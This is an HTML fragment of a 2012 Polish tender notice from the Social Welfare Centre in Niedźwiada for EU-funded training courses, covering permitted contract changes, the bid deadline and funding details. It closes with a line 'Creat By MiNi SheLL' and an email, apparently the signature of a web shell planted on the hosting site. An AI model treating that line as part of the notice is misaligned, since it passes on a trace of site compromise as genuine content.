<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do  treści Oferty Wykonawcy, polegające na:
a)	zmianie terminu zamówienia, nieprzekraczającej ram końcowych trwania zamówienia
b)	zmianie miejsca przeprowadzenia usługi, z zastrzeżeniem, że proponowane miejsce spełnia warunki określone w postępowaniu przetargowym;
c)	zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu;
d)	zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 10 umowy;
e)	zmianie osób przy pomocy których Wykonawca realizować będzie zamówienie, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opsniedzwiada.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Niedźwiadzie , Niedźwiada  Kolonia 42A, 21-104 Niedźwiada, woj. lubelskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2012 godzina 10:30, miejsce: Ośrodek Pomocy Społecznej w Niedźwiadzie , Niedźwiada  Kolonia 42A, 21-104 Niedźwiada, woj. lubelskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest usługa zorganizowania szkoleń i kursów w ramach projektu Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Niedźwiada realizowanego przez  Ośrodek Pomocy Społecznej w Niedźwiadzie współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com